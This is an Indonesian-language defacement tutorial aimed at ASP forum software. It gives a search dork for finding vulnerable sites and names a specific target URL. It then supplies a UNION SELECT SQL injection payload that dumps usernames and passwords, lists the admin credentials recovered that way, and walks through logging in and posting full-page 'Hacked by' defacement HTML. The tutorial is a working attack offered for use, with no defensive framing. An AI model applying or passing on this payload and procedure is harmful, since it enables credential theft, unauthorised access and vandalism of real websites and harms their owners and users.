Deface Forum

dork:

inurl:/forums.asp?iFor=

Pilih target...
Contoh target
http://www.coachgirl.com/forum/forums.asp?iFor=8&offset=58

Hapus angka dibelakang =
Hingga menjadi ini

http://www.coachgirl.com/forum/forums.asp?iFor=

Setelah = masukan SQL inject
12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users

Hingga menjadi seperti ini

hasil:


http://www.coachgirl.com/forum/forums.asp?iFor=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
Tulisan yg berderet di bawah nama 10 TOPICS itu adalah username
Tulisan yg berderet di bawah nama DATED itu adalah passwordnya

Cari username admin & passnya.
Ok..pada web target yg jadi bahan tutor ini saya menemukan username & password
Username : admin
Password : default

atau anda bisa register
dan masukan isi sesuai apa yang tercamtum

nie atau langsung saja login mengunakan user saya

Username : sohai
Password : jangan


Sekarang klik tulisan login yg berada diatas.
Nah..login udah berhasil
Sekarang jika ingin melakukan defacing, klik tulisan "POST NEW TOPICS"

Isi Subject nya...
Contoh : HACKED BY sohai
lalu masukin script deface HTML nya ke kolom di bawah subject.

Hmm......
Jika ingin menutup full seluruh halaman, pake code berikut

code:


<DIV  align=center><DIV id=Layer1 style="BORDER-RIGHT: #000000 1px;  BORDER-TOP: #000000 1px; Z-INDEX: 1; LEFT: 0px; BORDER-LEFT: black 1px;  WIDTH: 1300px; BORDER-BOTTOM: black 1px; POSITION: absolute; TOP: 0px;  HEIGHT: 7000px; BACKGROUND-COLOR: black; layer-background-color:  black"><center>
<br><b><font face="papyrus"  color="red" size="5">Attacked by :  sohai</font></h2><br><br><img  src="http://hamzajennings.com/wp-content/uploads/2008/07/hacked_11.jpg"  ><br><br>
<font face="papyrus" color="red"  size="5">This site Hacked by sohai</a><br><br>
<font  face="papyrus" color="red" size="5">Thanks to my girlfriend </font><br><br><font color="red"  size="3">Tasya
</DIV>

untuk hasil nya bisa dilihat seperti ini

http://www.coachgirl.com/forum/messages.asp?iMsg=331&iFor=8